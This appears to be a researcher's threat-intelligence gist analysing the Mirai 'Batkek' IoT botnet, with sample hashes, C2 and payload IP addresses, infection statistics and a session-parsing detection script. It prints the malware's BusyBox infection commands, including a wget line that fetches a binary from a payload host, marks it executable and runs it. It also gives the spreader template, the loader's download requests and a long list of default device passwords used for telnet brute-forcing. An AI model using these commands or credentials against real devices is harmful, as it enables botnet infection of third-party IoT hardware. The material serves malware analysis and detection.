@unixfreaxjp
Last active September 4, 2020 18:21

Mirai "Batkek"

Threat definition:

| Category | Name | Variant | Type | Target |
|---|---|---|---|---|
| Linux malware | Mirai | "Batkek" | DDoS botnet | Weak auth or vulnerable IoT devices |

Samples/PoC:

| No | hash | file | type |
|---|---|---|---|
| 1 | 5866781e2239cb53d2f6051f123bd44a | batkek_arm | ELF 32-bit Packed LSB executable, ARM, version 1, statically linked, stripped |
| 2 | e1c628d1f1db493db78bf08d59120725 | batkek_mips | ELF 32-bit Packed MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped |
| 3 | 4c354570729f96ce9a42a12235902f0d | loader-mips | ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped |

Detect period:

| from | until |
|---|---|
| July 1st 2020 | (now/on-going) |

Infrastructure:

| Function | IP | ASN | Prefix | ISP | Country |
|---|---|---|---|---|---|
| PayloadIP1 | 37.49.224.231 | AS199264 | 37.49.224.0/24 | XEMU | NL |
| PayloadIP2 | 45.88.148.250 | AS35913 | 45.88.148.0/22 | DEDIPATH-LLC | US |
| C2 (Mirai) | 45.88.148.250:5683 | AS35913 | 45.88.148.0/22 | DEDIPATH-LLC | US |
| C2 (Infra) | 37.49.230.240 | AS208666 | 37.49.230.0/24 | ESTROWEB | NL |

Binary names:

| No | Name |
|---|---|
| 1 | arm |
| 2 | arm7 |
| 3 | mips |
| 4 | mipsel |
| 5 | powerpc |
| 6 | sh4 |
| 7 | m68k |
| 8 | sparc |

Botnet infection rank and heatmap:

| Rank | Country | Bots |
|---|---|---|
| 1 | China | 45 |
| 2 | Brazil | 31 |
| 3 | Thailand | 16 |
| 4 | Russia | 7 |
| 5 | USA | 6 |
| 6 | Taiwan | 5 |

(Infection heatmap)

Infection pattern:

enable
system
shell
sh
/bin/busybox DMSNA
/bin/busybox mkdir /tmp/; >/tmp/.file && cd /tmp/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /var/; >/var/.file && cd /var/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /dev/; >/dev/.file && cd /dev/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /mnt/; >/mnt/.file && cd /mnt/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /var/run/; >/var/run/.file && cd /var/run/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /var/tmp/; >/var/tmp/.file && cd /var/tmp/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /; >/.file && cd /
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /dev/netslink/; >/dev/netslink/.file && cd /dev/netslink/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /dev/shm/; >/dev/shm/.file && cd /dev/shm/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /bin/; >/bin/.file && cd /bin/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /etc/; >/etc/.file && cd /etc/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /boot/; >/boot/.file && cd /boot/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /usr/; >/usr/.file && cd /usr/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /sys/; >/sys/.file && cd /sys/
/bin/busybox rm -rf .file .z .x
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HGYQA
/bin/busybox cp /bin/busybox .z; >.z; /bin/busybox chmod 777 .z
/bin/busybox wget hxxp://{PAYLOAD_IP}:80/batkek/arm -O -> .z; /bin/busybox chmod 777 .z; ./.z telnet.arm.wget; >.z

Spreaders:

(wget)

(template) 
/bin/busybox wget http://%d.%d.%d.%d:%d/%s -O -> %s; /bin/busybox chmod 777 %s; ./%s telnet.%s.wget; >%s\r\n
  ↓↓
(execution)
/bin/busybox wget hxxp://37.49.224.231:80/batkek/{arm|arm7|mips|mipsel|powerpc|sh4|m68k|sparc} -O -> .z; \
    /bin/busybox chmod 777 .z; ./.z telnet.{arm|arm7|mips|mipsel|powerpc|sh4|m68k|sparc}.wget; >.z
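
A detection sketch for the infection pattern and the wget spreader template above, added here as an example (it is not code from this gist or from the malware). It scans a captured telnet session for the all-caps BusyBox tokens, the `.file` writability probes and the download-and-run line, and extracts the payload host plus the `vector.arch.method` tag. The function name, regex names and sample transcript (using an RFC 5737 documentation address) are constructed for illustration.

```python
import re

# Constructed transcript modelled on the infection pattern above; the payload
# host is an RFC 5737 documentation address, not an address from the page.
SAMPLE_SESSION = """\
enable
system
shell
sh
/bin/busybox DMSNA
/bin/busybox mkdir /tmp/; >/tmp/.file && cd /tmp/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /var/; >/var/.file && cd /var/
/bin/busybox rm -rf .file .z .x
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HGYQA
/bin/busybox cp /bin/busybox .z; >.z; /bin/busybox chmod 777 .z
/bin/busybox wget http://192.0.2.10:80/batkek/arm -O -> .z; /bin/busybox chmod 777 .z; ./.z telnet.arm.wget; >.z
"""

# busybox called with an all-caps token instead of a real applet name
MARKER = re.compile(r"/bin/busybox ([A-Z]{4,})\s*$")
# ">/dir/.file && cd /dir/": tests whether the directory is writable
PROBE = re.compile(r">(/\S*)\.file && cd ")
# "wget <scheme>://a.b.c.d:port/path -O -> <file>;" (hxxp accepted for defanged logs)
FETCH = re.compile(r"wget (?:https?|hxxp)://([\d.]+):(\d+)/(\S+) -O -> (\S+);")
# "./<file> <vector>.<arch>.<method>;": the dropped file run with its tag
RUN = re.compile(r"\./(\S+) (\w+)\.(\w+)\.(\w+);")

def analyze_session(text):
    """Summarise loader behaviour seen in one captured shell session."""
    report = {"markers": [], "probed_dirs": [], "downloads": []}
    for line in (raw.strip() for raw in text.splitlines()):
        marker = MARKER.search(line)
        if marker:
            report["markers"].append(marker.group(1))
        probe = PROBE.search(line)
        if probe:
            report["probed_dirs"].append(probe.group(1))
        fetch, run = FETCH.search(line), RUN.search(line)
        # Only count a download when the same file is fetched and then executed.
        if fetch and run and fetch.group(4) == run.group(1):
            report["downloads"].append({
                "host": fetch.group(1), "port": int(fetch.group(2)),
                "path": fetch.group(3), "dropped_as": fetch.group(4),
                "vector": run.group(2), "arch": run.group(3),
                "method": run.group(4),
            })
    # Flag only sessions that show both the marker probe and a fetch-and-run.
    report["is_loader_session"] = bool(report["markers"] and report["downloads"])
    return report

if __name__ == "__main__":
    print(analyze_session(SAMPLE_SESSION))
```

The extracted `host` and `path` values can be compared against the payload addresses listed under Infrastructure when triaging honeypot or device shell logs.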

(hexstring loader)

:> ! file ./batkek-loader-mips
./batkek-loader-mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
:> !rahash2 -a md5 ./batkek-loader-mips
./batkek-loader-mips: 0x00000000-0x000006ef 
md5: 4c354570729f96ce9a42a12235902f0d
:> ie
[Entrypoints]
vaddr=0x004001e8 paddr=0x000001e8 haddr=0x00000018 hvaddr=0x00400018 type=program
:> !seekc2.pl
1
    0x0040024c    |    uStack116 = 2;
    0x00400254    |    uStack114 = 0x50;
    0x00400264    |    uStack112 = 0x2d5894fa;
2
    0x400520 5 4 mips
    0x40052c 23 22 GET /mips HTTP/1.0\r\n\r\n
3
? 0x2d 0x58 0x94 0xfa~uint
uint32  45
uint32  88
uint32  148
uint32  250
4
GET hxxp://45.88.148.250/arm hxxp/1.0\r\n\r\n       
GET hxxp://45.88.148.250/arm7 hxxp/1.0\r\n\r\n  
GET hxxp://45.88.148.250/mips hxxp/1.0\r\n\r\n  
GET hxxp://45.88.148.250/mipsel hxxp/1.0\r\n\r\n
GET hxxp://45.88.148.250/powerpc hxxp/1.0\r\n\r\n     
GET hxxp://45.88.148.250/sh4 hxxp/1.0\r\n\r\n   
GET hxxp://45.88.148.250/m68k hxxp/1.0\r\n\r\n  
GET hxxp://45.88.148.250/sparc hxxp/1.0\r\n\r\n 
:>

Hidden config data (scanner & intrusion related)

ogin...sername...vrdvs...ccount...enter...ulti-call...help...$...#...>...~...
nvalid...ailed...ncorrect...enied...rror...oodbye...bad...solokey...colorkey...
tsgoingon......taZz@23495859......aquario...xc3511...20080826...ahetzip8...changeme...
antslq...hunt5759...alpine...1001chin...samsung...5up...ipcam_rt5350...fidel123...default...
swsbzkgn...sipwise...sixaola...stxadmin...hslwificam...zksoft3...123123...1234qwer...adm...
oelinux123...oelinux1234...ivdev...ttnet...hikvision...icatch99...fxjvt1805...zte...glasshou...
QwestM0dem...gpon...12341234...ho4uku6at...system...linga...adfexc...installer...362729...
nE7jA%5m...telecomadmin...t0talc0ntr0l4!...GM8182...zyad1234...1234567890...1988...linuxshell...
tini...calvin...blender...hipc3518...2011vsta...timeserver...TrippLite...zhongxing...cat1029...
daemon...huigu309...leostream...letacla...zyad5001...annie2012...GEPON...vhd1206...059AnkJ...
e10adc39...merlin...mg3500...qazxsw...grouter...vertex25ektks123...zsun1188...12345...123456...
xmhdipc...h3c...ipc71a...IPCam@sw...cms500...CenturyL1nk...isp...3333333...bin...ispadmin...
CTLsupport12...v2mprt...vsONU101...bananapi...nokia...54321...888888888...localhost...vortex25...
y1n2inc.com0755...nexxadmin...telnetadmin...dnsekakf219651...CUAdmin...zte9x15...juantech...davox...
hacktheworld1337...teladmin...hg2x0...hichiphx...apix...smcadmin...klv123...klv1234...Zte521...
hi3518...jvbzd...anko...zlxx....ceadmin...Cisco...iDirect...hdipc%No...founder88...7ujMko0vizxv...
7ujMko0admin...!root...ikwb...dreambox...realtek...111111111...e8ehome1...e8telnet...localadmin...
99999...7777777...password...6666666...555555555...2222...pass...00000000...user...3ep5w2u...Mau'dib...
wyse...warmWLspot...admin1234...admin1...administrator...support...LSiuY7pOmZG2s...linux...ROOT500...
rootroot...guest...ubnt...service...444444444

Botnet; Size (Sun Aug 23 21:37:10) = 138 (infected devices), w/ IP details:


Sun Aug 23 21:37:10 JST 2020

@unixfreaxjp / malwaremustdie.org
